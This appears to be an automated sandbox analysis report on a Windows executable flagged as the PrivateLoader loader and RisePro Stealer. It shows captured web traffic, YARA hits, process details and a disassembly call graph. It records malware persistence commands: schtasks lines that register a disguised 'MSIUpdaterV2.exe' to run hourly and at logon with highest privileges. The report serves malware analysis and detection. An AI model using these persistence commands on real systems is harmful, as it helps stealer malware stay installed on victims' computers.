                                                                        2024-05-12 10:31:52 UTC2343INData Raw: 67 20 52 65 73 69 64 65 6e 74 69 61 6c 20 56 49 53 41 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 36 37 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 68 66 65 2d 63 72 65 61 74 69 76 65 2d 6d 65 6e 75 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 6f 62 74 61 69 6e 69 6e 67 2d 6d 6f 72 74 67 61 67 65 2d 6c 6f 61 6e 73 2d 61 6e 64 2d 62 61 6e 6b 2d 66 69 6e 61 6e 63 69 6e 67 2f 22 20 63 6c 61 73 73 20 3d 20 22 68 66 65 2d 73 75 62 2d 6d 65 6e 75 2d 69 74 65 6d 22 3e 42 61 6e 6b 20 46 69 6e 61 6e 63 69 6e 67 3c 2f
                                                                        Data Ascii: g Residential VISA</a></li><li id="menu-item-3467" class="menu-item menu-item-type-post_type menu-item-object-page hfe-creative-menu"><a href="https://easy2buy.ae/obtaining-mortgage-loans-and-bank-financing/" class = "hfe-sub-menu-item">Bank Financing</
                                                                        2024-05-12 10:31:53 UTC16384INData Raw: 63 33 65 34 0d 0a 09 09 3c 2f 68 65 61 64 65 72 3e 0a 0a 09 3c 6d 61 69 6e 20 69 64 3d 22 71 6f 64 65 66 2d 70 61 67 65 2d 63 6f 6e 74 65 6e 74 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 09 3c 64 69 76 20 69 64 3d 22 71 6f 64 65 66 2d 34 30 34 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 71 6f 64 65 66 2d 34 30 34 2d 70 61 67 65 2d 69 6e 6e 65 72 22 3e 0a 09 09 3c 68 32 20 63 6c 61 73 73 3d 22 71 6f 64 65 66 2d 34 30 34 2d 74 69 74 6c 65 22 3e 4f 6f 70 73 2e 2e 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 21 3c 2f 68 32 3e 0a 09 09 3c 70 20 63 6c 61 73 73 3d 22 71 6f 64 65 66 2d 34 30 34 2d 74 65 78 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73
                                                                        Data Ascii: c3e4</header><main id="qodef-page-content" role="main"><div id="qodef-404-page"><div class="qodef-404-page-inner"><h2 class="qodef-404-title">Oops... Page Not Found!</h2><p class="qodef-404-text">The page you are looking for does not exis
                                                                        2024-05-12 10:31:53 UTC16384INData Raw: 6f 78 22 20 64 61 74 61 2d 69 64 3d 22 39 34 65 36 63 64 62 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 77 69 64 67 65 74 22 20 64 61 74 61 2d 77 69 64 67 65 74 5f 74 79 70 65 3d 22 69 63 6f 6e 2d 62 6f 78 2e 64 65 66 61 75 6c 74 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 63 73 73 2f 63 75 73 74 6f 6d 2d 77 69 64 67 65 74 2d 69 63 6f 6e 2d 62 6f 78 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 31 36 38 37
                                                                        Data Ascii: ox" data-id="94e6cdb" data-element_type="widget" data-widget_type="icon-box.default"><div class="elementor-widget-container"><link rel="stylesheet" href="https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.css?ver=1687


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:12:30:51
                                                                        Start date:12/05/2024
                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                        Imagebase:0xaa0000
                                                                        File size:3'434'744 bytes
                                                                        MD5 hash:A594A9E1F8DB460345E86810D1C9A639
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000003.2602349258.00000000064D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000003.2602143972.0000000006419000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000003.2602388516.0000000006454000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000003.2601984271.0000000006490000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000003.2094948429.00000000066DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000003.2602058976.0000000006B77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:4
                                                                        Start time:12:31:52
                                                                        Start date:12/05/2024
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
                                                                        Imagebase:0x140000
                                                                        File size:187'904 bytes
                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:12:31:52
                                                                        Start date:12/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:12:31:52
                                                                        Start date:12/05/2024
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST
                                                                        Imagebase:0x140000
                                                                        File size:187'904 bytes
                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:12:31:52
                                                                        Start date:12/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:10.7%
                                                                          Dynamic/Decrypted Code Coverage:8.1%
                                                                          Signature Coverage:26.6%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:101
                                                                          execution_graph 89108 b037b0 89128 b037f9 std::_Throw_Cpp_error 89108->89128 89109 b03811 89145 b86c20 89109->89145 89112 b05c13 CreateDirectoryA 89114 b05c3e 89112->89114 89118 b0672d 89112->89118 89113 b069a9 89173 ab85d0 89113->89173 89114->89118 89159 abb260 89114->89159 89117 b069c7 89118->89113 89119 ad9820 6 API calls 89118->89119 89124 b068ca 89119->89124 89120 ab30f0 GetLastError 89125 b05c66 std::_Throw_Cpp_error 89120->89125 89121 ab30f0 GetLastError 89121->89128 89122 add0a8 16 API calls 89122->89113 89123 ab3200 GetLastError 89123->89125 89124->89113 89124->89122 89125->89118 89125->89120 89125->89123 89127 abb260 GetLastError 89125->89127 89130 b86c20 10 API calls 89125->89130 89132 b05e29 CreateDirectoryA 89125->89132 89136 b05f38 CreateDirectoryA 89125->89136 89139 abaf80 GetLastError 89125->89139 89140 abb400 GetLastError 89125->89140 89164 ad9820 89125->89164 89167 add0a8 89125->89167 89126 ab3200 GetLastError 89126->89128 89127->89125 89128->89109 89128->89121 89128->89126 89129 abb260 GetLastError 89128->89129 89131 b86c20 10 API calls 89128->89131 89133 b86b90 10 API calls 89128->89133 89135 ad9820 6 API calls 89128->89135 89138 add0a8 16 API calls 89128->89138 89141 abbae0 GetLastError 89128->89141 89142 abb400 GetLastError 89128->89142 89143 abaf80 GetLastError 89128->89143 89144 abb1e0 GetLastError 89128->89144 89129->89128 89130->89125 89131->89128 89132->89125 89133->89128 89135->89128 89136->89125 89138->89128 89139->89125 89140->89125 89141->89128 89142->89128 89143->89128 89144->89128 89184 ad2b99 89145->89184 89148 b86ccd 89191 ad2534 89148->89191 89149 b86c57 89150 b86cd4 89149->89150 89155 b86c63 89149->89155 89152 ad2534 std::_Throw_Cpp_error 8 API calls 89150->89152 89153 b86ce5 89152->89153 89157 b86c87 GetLastError 89155->89157 89158 b86c92 89155->89158 89156 b05c0f 89156->89112 89156->89114 89157->89158 89187 ad2baa 89158->89187 89160 abb2b8 std::_Throw_Cpp_error std::_Facet_Register 89159->89160 89163 abb2e2 std::ios_base::_Ios_base_dtor std::_Facet_Register 89160->89163 89262 aa7cf0 89160->89262 89162 abb3ee 89163->89125 89270 ad975e 89164->89270 89166 ad9832 89166->89125 89168 add0bb __fread_nolock 89167->89168 89299 adcf83 89168->89299 89170 add0c7 89308 ad899c 89170->89308 89174 ab863c std::ios_base::_Ios_base_dtor 89173->89174 89175 ab85f3 89173->89175 89174->89117 89175->89174 89176 aa4900 std::_Throw_Cpp_error GetLastError 89175->89176 89177 ab8728 std::_Facet_Register 89176->89177 89178 ad2729 std::_Throw_Cpp_error 6 API calls 89177->89178 89179 ab873b 89178->89179 89180 aba060 std::_Throw_Cpp_error 8 API calls 89179->89180 89181 ab8778 89180->89181 89182 ab87cc 89181->89182 89183 aa4900 std::_Throw_Cpp_error GetLastError 89181->89183 89182->89117 89183->89182 89197 ad2bc8 89184->89197 89186 ad2ba6 89186->89148 89186->89149 89190 ad2bb6 89187->89190 89188 ad2bf2 _ValidateLocalCookies 89188->89156 89190->89156 89190->89188 89202 ad302b GetSystemTimePreciseAsFileTime __aulldiv __aullrem __Xtime_get_ticks 89190->89202 89192 ad254a std::_Throw_Cpp_error 89191->89192 89203 ad24e7 89192->89203 89194 ad255a __EH_prolog3 std::_Throw_Cpp_error 89207 ab9cb0 89194->89207 89196 ad25c7 std::_Throw_Cpp_error 89196->89150 89200 ad2be2 89197->89200 89198 ad2bf2 _ValidateLocalCookies 89198->89186 89200->89198 89201 ad302b GetSystemTimePreciseAsFileTime __aulldiv __aullrem __Xtime_get_ticks 89200->89201 89201->89200 89202->89190 89204 ad24f3 std::_Throw_Cpp_error __EH_prolog3_GS 89203->89204 89218 aa36e0 89204->89218 89206 ad251c std::_Throw_Cpp_error 89206->89194 89224 aa4900 89207->89224 89209 ab9d26 std::_Facet_Register 89228 ad2729 89209->89228 89211 ab9d39 89238 aba060 89211->89238 89213 ab9dc7 89216 ab9dd3 89213->89216 89249 ad2970 GetLastError GetProcAddress std::_Lockit::~_Lockit std::_Lockit::_Lockit 89213->89249 89214 ab9d76 89214->89213 89215 aa4900 std::_Throw_Cpp_error GetLastError 89214->89215 89215->89213 89216->89196 89220 aa3731 std::_Throw_Cpp_error 89218->89220 89219 aa385f std::ios_base::_Ios_base_dtor 89219->89206 89220->89219 89223 ad4b78 GetLastError ___std_exception_destroy 89220->89223 89222 aa38f5 std::ios_base::_Ios_base_dtor 89222->89206 89223->89222 89225 aa491a std::_Throw_Cpp_error 89224->89225 89225->89209 89250 aa47f0 GetLastError std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error 89225->89250 89227 aa4968 std::ios_base::_Ios_base_dtor 89227->89209 89229 ad2735 __EH_prolog3 89228->89229 89251 ad2470 89229->89251 89231 ad2740 89234 ad2771 std::_Throw_Cpp_error std::_Lockit::~_Lockit 89231->89234 89255 ad288c GetLastError std::locale::_Locimp::_Locimp std::_Facet_Register 89231->89255 89233 ad2753 89256 ad28af 6 API calls std::locale::_Setgloballocale 89233->89256 89234->89211 89236 ad275b 89257 ab5a60 GetLastError ___std_exception_destroy std::locale::_Locimp::_Locimp 89236->89257 89239 ad2470 std::_Lockit::_Lockit 2 API calls 89238->89239 89240 aba0a2 89239->89240 89241 ad2470 std::_Lockit::_Lockit 2 API calls 89240->89241 89242 aba0c4 std::_Throw_Cpp_error std::_Lockit::~_Lockit std::_Facet_Register 89240->89242 89241->89242 89248 aba144 std::_Lockit::~_Lockit std::_Facet_Register 89242->89248 89259 aa4040 8 API calls 3 library calls 89242->89259 89244 aba182 89260 ad2cf4 6 API calls 2 library calls 89244->89260 89246 aba1ca 89261 aa4100 8 API calls 3 library calls 89246->89261 89248->89214 89249->89216 89250->89227 89252 ad247f 89251->89252 89254 ad2484 std::_Lockit::_Lockit 89251->89254 89258 ae42aa GetLastError GetProcAddress std::_Lockit::_Lockit std::_Locinfo::_Locinfo_dtor 89252->89258 89254->89231 89255->89233 89256->89236 89257->89234 89258->89254 89259->89244 89260->89246 89261->89248 89268 aa7350 GetLastError std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error ___std_exception_destroy 89262->89268 89264 aa7d80 89265 aa7dcd std::ios_base::_Ios_base_dtor 89264->89265 89269 aa7350 GetLastError std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error ___std_exception_destroy 89264->89269 89265->89162 89267 aa7ece std::ios_base::_Ios_base_dtor 89267->89162 89268->89264 89269->89267 89272 ad976a __fread_nolock 89270->89272 89271 ad9771 89283 ad8c60 6 API calls __fread_nolock 89271->89283 89272->89271 89273 ad9791 89272->89273 89275 ad9781 89273->89275 89279 aea8ef 89273->89279 89275->89166 89277 ad97ac 89277->89275 89284 ad97fe 6 API calls __fread_nolock 89277->89284 89280 aea8fb __fread_nolock std::_Lockit::_Lockit 89279->89280 89285 aea993 89280->89285 89282 aea916 89282->89277 89283->89275 89284->89275 89286 aea9b6 __fread_nolock 89285->89286 89287 aeaa0e std::_Locinfo::_Locinfo_dtor 89286->89287 89291 aea9fc __fread_nolock 89286->89291 89293 ae1264 6 API calls __fread_nolock 89286->89293 89294 aeb01a 89287->89294 89289 aeaa20 89289->89291 89298 aeb7f4 GetLastError GetProcAddress std::locale::_Setgloballocale 89289->89298 89291->89282 89293->89286 89295 aeb025 89294->89295 89297 aeb047 89294->89297 89296 aeb03a GetLastError 89295->89296 89295->89297 89296->89297 89297->89289 89298->89291 89300 adcf8f __fread_nolock 89299->89300 89301 adcf99 89300->89301 89303 adcfbc __fread_nolock 89300->89303 89328 ad8be3 5 API calls __fread_nolock 89301->89328 89307 adcfb4 89303->89307 89314 add01a 89303->89314 89305 adcfe7 89329 add012 6 API calls __fread_nolock 89305->89329 89307->89170 89309 ad89a8 89308->89309 89310 ad89bf 89309->89310 89438 ad8a47 6 API calls 2 library calls 89309->89438 89312 ad89d2 89310->89312 89439 ad8a47 6 API calls 2 library calls 89310->89439 89312->89125 89315 add04a 89314->89315 89316 add027 89314->89316 89325 add042 89315->89325 89330 ad9a91 89315->89330 89352 ad8be3 5 API calls __fread_nolock 89316->89352 89323 add076 89345 ae8d2c 89323->89345 89325->89305 89327 aeb01a ___std_exception_destroy GetLastError 89327->89325 89328->89307 89329->89307 89331 ad9aaa 89330->89331 89332 ad9ad1 89330->89332 89331->89332 89333 aea1e9 __fread_nolock 6 API calls 89331->89333 89336 aeb054 89332->89336 89334 ad9ac6 89333->89334 89353 ae9678 89334->89353 89337 aeb06b 89336->89337 89338 add06a 89336->89338 89337->89338 89339 aeb01a ___std_exception_destroy GetLastError 89337->89339 89340 aea1e9 89338->89340 89339->89338 89341 aea20a 89340->89341 89342 aea1f5 89340->89342 89341->89323 89418 ad8c60 6 API calls __fread_nolock 89342->89418 89344 aea205 89344->89323 89346 add07d 89345->89346 89347 ae8d55 89345->89347 89346->89325 89346->89327 89348 ae8da4 89347->89348 89350 ae8d7c 89347->89350 89425 ad8be3 5 API calls __fread_nolock 89348->89425 89419 ae8c9b 89350->89419 89352->89325 89355 ae9684 __fread_nolock 89353->89355 89354 ae968c 89354->89332 89355->89354 89356 ae96c5 89355->89356 89358 ae970b 89355->89358 89385 ad8be3 5 API calls __fread_nolock 89356->89385 89361 ae972f 89358->89361 89362 ae9789 89358->89362 89386 ae9781 GetLastError GetLastError GetProcAddress 89361->89386 89363 ae97b1 89362->89363 89382 ae97d4 __fread_nolock 89362->89382 89364 ae97b5 89363->89364 89366 ae9810 89363->89366 89392 ad8be3 5 API calls __fread_nolock 89364->89392 89367 ae982e 89366->89367 89393 ae263d 89366->89393 89387 ae92ce 89367->89387 89370 ae9840 89371 ae988d 89370->89371 89372 ae9846 89370->89372 89375 ae98f6 89371->89375 89376 ae98a1 89371->89376 89373 ae984e 89372->89373 89374 ae9875 89372->89374 89373->89382 89396 ae9266 GetLastError CloseHandle GetLastError 89373->89396 89397 ae8e9f 7 API calls 3 library calls 89374->89397 89375->89382 89383 ae9918 GetLastError 89375->89383 89378 ae98a9 89376->89378 89379 ae98e2 89376->89379 89378->89382 89398 ae9426 GetLastError _ValidateLocalCookies 89378->89398 89399 ae934b GetLastError _ValidateLocalCookies 89379->89399 89382->89361 89383->89382 89385->89354 89386->89354 89400 af3be3 89387->89400 89389 ae92e0 89390 ae930e 89389->89390 89405 ade1d0 6 API calls __fread_nolock 89389->89405 89390->89370 89392->89382 89407 ae251c 89393->89407 89395 ae2656 89395->89367 89396->89382 89397->89382 89398->89382 89399->89382 89402 af3bf0 89400->89402 89403 af3bfd 89400->89403 89401 af3c09 89401->89389 89402->89389 89403->89401 89406 ad8c60 6 API calls __fread_nolock 89403->89406 89405->89390 89406->89402 89412 aee940 89407->89412 89409 ae252e 89410 ae2562 GetLastError 89409->89410 89411 ae2536 __fread_nolock 89409->89411 89410->89411 89411->89395 89414 aee962 __dosmaperr 89412->89414 89415 aee94d __dosmaperr 89412->89415 89413 aee987 89413->89409 89414->89413 89417 ad8c60 6 API calls __fread_nolock 89414->89417 89415->89409 89417->89415 89418->89344 89420 ae8ca7 __fread_nolock 89419->89420 89421 ae8ce6 89420->89421 89426 ae8dff 89420->89426 89437 ae8d20 GetLastError GetLastError GetProcAddress 89421->89437 89424 ae8d09 89424->89346 89425->89346 89427 aee940 __fread_nolock 6 API calls 89426->89427 89428 ae8e0f 89427->89428 89429 ae8e47 89428->89429 89430 aee940 __fread_nolock 6 API calls 89428->89430 89436 ae8e15 __fread_nolock 89428->89436 89431 aee940 __fread_nolock 6 API calls 89429->89431 89429->89436 89433 ae8e3e 89430->89433 89432 ae8e53 FindCloseChangeNotification 89431->89432 89434 ae8e5f GetLastError 89432->89434 89432->89436 89435 aee940 __fread_nolock 6 API calls 89433->89435 89434->89436 89435->89429 89436->89421 89437->89424 89438->89310 89439->89312 89440 bb1350 89441 bb136d 89440->89441 89453 bb1372 89441->89453 89473 ba6690 89441->89473 89442 be9cc0 GetLastError 89444 bb1907 89442->89444 89446 be7500 2 API calls 89444->89446 89447 bb1946 89444->89447 89446->89447 89448 bb1428 89486 be7500 89448->89486 89451 be7500 2 API calls 89451->89453 89452 bb1681 89469 bb1693 89452->89469 89496 bc0ec0 GetLastError 89452->89496 89453->89442 89453->89444 89455 bb1461 89460 bb1465 89455->89460 89490 be9cc0 89455->89490 89457 bb17c6 89458 bb17d8 89457->89458 89459 bb1880 89457->89459 89462 be7500 2 API calls 89458->89462 89464 be7500 2 API calls 89459->89464 89460->89452 89477 bdcd10 89460->89477 89494 bde9c0 GetLastError GetLastError 89460->89494 89495 bdcc20 GetLastError 89460->89495 89472 bb17e5 89462->89472 89464->89472 89465 bb17be 89498 bd3ff0 GetLastError 89465->89498 89469->89457 89469->89465 89497 bd4390 GetLastError GetLastError 89469->89497 89471 be9cc0 GetLastError 89471->89472 89472->89453 89472->89471 89499 bd6180 GetLastError 89472->89499 89474 ba6716 89473->89474 89476 ba66a5 89473->89476 89474->89448 89474->89455 89474->89460 89475 be9cc0 GetLastError 89475->89476 89476->89474 89476->89475 89478 bdcd31 89477->89478 89479 bdce1d 89477->89479 89478->89479 89481 bdcd47 89478->89481 89500 bdcf10 89478->89500 89513 bdefd0 GetLastError 89478->89513 89514 bdce60 GetLastError GetLastError 89478->89514 89515 bdd590 GetLastError 89478->89515 89479->89481 89516 bde7b0 GetLastError 89479->89516 89481->89460 89487 be750b 89486->89487 89489 bb1435 89486->89489 89487->89489 89597 bd75c0 GetLastError GetLastError 89487->89597 89489->89451 89489->89453 89491 be9d16 89490->89491 89492 be9ccb 89490->89492 89491->89460 89492->89491 89598 ae1c96 89492->89598 89494->89460 89495->89460 89496->89469 89497->89465 89498->89457 89499->89472 89517 bdf480 89500->89517 89502 bdcf25 89504 bdd07f 89502->89504 89549 bdf210 89502->89549 89504->89478 89505 bdd077 89505->89504 89561 bdf420 GetLastError 89505->89561 89507 bdcf3f 89507->89504 89507->89505 89508 bdd027 89507->89508 89512 bdd043 89508->89512 89556 bdf420 GetLastError 89508->89556 89510 bdd059 89510->89478 89557 be3780 89512->89557 89513->89478 89514->89478 89515->89478 89516->89481 89518 bdf49a 89517->89518 89524 bdf4db __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 89517->89524 89567 be3d90 89518->89567 89520 bdf519 89520->89502 89522 bdf76d 89526 bdf77e 89522->89526 89547 bdf5db 89522->89547 89523 bdf65e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 89528 bdf961 89523->89528 89529 bdf972 89523->89529 89542 bdf9c7 89523->89542 89524->89520 89524->89522 89524->89523 89530 bdf821 89524->89530 89538 bdf7d2 89524->89538 89539 bdf82a 89524->89539 89524->89547 89525 bdf876 89525->89522 89525->89523 89527 be1640 GetLastError 89526->89527 89532 bdf78c 89527->89532 89534 be1640 GetLastError 89528->89534 89543 bdf99b 89529->89543 89562 c6301a 89529->89562 89575 be13c0 GetLastError 89530->89575 89532->89502 89537 bdf96a 89534->89537 89535 be1640 GetLastError 89536 bdfa0e 89535->89536 89536->89502 89537->89502 89538->89539 89541 bdf807 89538->89541 89538->89547 89539->89523 89539->89547 89576 be0a20 GetLastError __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 89539->89576 89540 bdf98e 89540->89543 89540->89547 89544 be1640 GetLastError 89541->89544 89542->89520 89542->89535 89543->89542 89545 be3d90 GetLastError 89543->89545 89546 bdf819 89544->89546 89545->89542 89546->89502 89571 be1640 89547->89571 89550 bdf228 89549->89550 89552 bdf232 89549->89552 89550->89507 89553 bdf26a 89552->89553 89554 bdf23e 89552->89554 89555 c6301a GetLastError 89552->89555 89553->89507 89554->89553 89590 be15e0 89554->89590 89555->89554 89556->89512 89558 be378c 89557->89558 89559 be37af 89558->89559 89560 be9cc0 GetLastError 89558->89560 89559->89510 89560->89559 89561->89504 89563 be592f 89562->89563 89564 c63032 89562->89564 89565 be593a GetLastError 89563->89565 89566 be5944 89563->89566 89564->89540 89565->89566 89566->89540 89568 be3e2a 89567->89568 89569 be3da0 89567->89569 89568->89524 89577 be2d40 89569->89577 89572 be16db 89571->89572 89573 be164d 89571->89573 89572->89520 89573->89572 89573->89573 89574 be3d90 GetLastError 89573->89574 89574->89572 89575->89539 89576->89525 89578 be2d4c 89577->89578 89580 be2d71 89578->89580 89581 be3380 89578->89581 89580->89568 89582 be344a 89581->89582 89583 be3396 89581->89583 89582->89580 89583->89582 89585 be38b0 89583->89585 89586 be391a 89585->89586 89588 be38b7 89585->89588 89586->89583 89587 be38c7 89587->89583 89588->89587 89589 be9cc0 GetLastError 89588->89589 89589->89586 89591 be1608 89590->89591 89592 be15f0 89590->89592 89593 be1640 GetLastError 89591->89593 89592->89591 89596 bde8e0 GetLastError 89592->89596 89594 be161a 89593->89594 89594->89553 89596->89591 89597->89489 89599 aeb01a ___std_exception_destroy GetLastError 89598->89599 89600 ae1cae 89599->89600 89600->89491 89601 cd44a1 89604 cca734 89601->89604 89605 b836b2 89604->89605 89605->89604 89606 b83e08 RegOpenKeyExA 89605->89606 89606->89605 89607 ac0320 89615 ac0330 89607->89615 89608 ac073d 89618 ade2bd 6 API calls __fread_nolock 89608->89618 89609 ac0777 89611 ac0754 89609->89611 89619 ade271 6 API calls __fread_nolock 89609->89619 89617 ac0765 89611->89617 89620 adcf6c 6 API calls 89611->89620 89614 ac07cb 89615->89608 89615->89609 89616 ac03c8 89615->89616 89618->89611 89619->89611 89620->89614 89621 bd8210 89622 bd8232 89621->89622 89623 bd82d8 89622->89623 89624 bd8270 89622->89624 89627 bd82a4 89622->89627 89626 be9cc0 GetLastError 89623->89626 89623->89627 89630 be9890 89624->89630 89626->89627 89628 bd8280 89628->89627 89629 be9cc0 GetLastError 89628->89629 89629->89627 89631 be98a5 89630->89631 89636 be992b 89630->89636 89632 be998e 89631->89632 89634 be991d 89631->89634 89638 be98a9 89631->89638 89642 b9be30 89632->89642 89634->89636 89640 be9cc0 GetLastError 89634->89640 89635 be9993 89637 be9997 89635->89637 89651 be9b20 89635->89651 89636->89628 89637->89628 89638->89628 89641 be9984 89640->89641 89641->89628 89643 b9be43 89642->89643 89644 b9be4c 89642->89644 89643->89635 89645 b9be30 GetLastError 89644->89645 89650 b9c199 89644->89650 89646 b9c171 89645->89646 89647 be9cc0 GetLastError 89646->89647 89646->89650 89648 b9c191 89647->89648 89649 b9be30 GetLastError 89648->89649 89649->89650 89650->89635 89652 be9b44 89651->89652 89653 be9b34 89651->89653 89654 be9b4e 89652->89654 89655 be9cc0 GetLastError 89652->89655 89653->89636 89654->89636 89655->89654 89656 afe0c0 89657 afe121 89656->89657 89658 afe198 CreateDirectoryA 89657->89658 89660 afe849 89658->89660 89673 afe1cc std::_Throw_Cpp_error 89658->89673 89659 afe825 std::_Throw_Cpp_error 89677 b7efb0 89659->89677 89661 afe8e2 CreateDirectoryA 89660->89661 89663 aff09f std::_Throw_Cpp_error 89660->89663 89661->89663 89674 afe910 std::_Throw_Cpp_error 89661->89674 89664 b86c20 10 API calls 89664->89673 89665 afe33f CreateDirectoryA 89665->89673 89666 afea89 CreateDirectoryA 89666->89674 89667 afe432 CreateDirectoryA 89667->89673 89668 afeb7c CreateDirectoryA 89668->89674 89669 afe51f CreateDirectoryA 89669->89673 89670 b86c20 10 API calls 89670->89674 89671 afed50 CreateDirectoryA 89671->89674 89672 afec69 CreateDirectoryA 89672->89674 89673->89659 89673->89664 89673->89665 89673->89667 89673->89669 89675 afe774 CreateDirectoryA 89673->89675 89674->89663 89674->89666 89674->89668 89674->89670 89674->89671 89674->89672 89676 afefd0 CreateDirectoryA 89674->89676 89675->89673 89676->89674 89678 ad59b0 89677->89678 89679 b7f008 SHGetFolderPathA 89678->89679 89680 b7f0d0 89679->89680 89681 b86c20 10 API calls 89680->89681 89682 b7f1c5 std::ios_base::_Ios_base_dtor 89681->89682 89682->89660 89683 aff6c0 89684 aff714 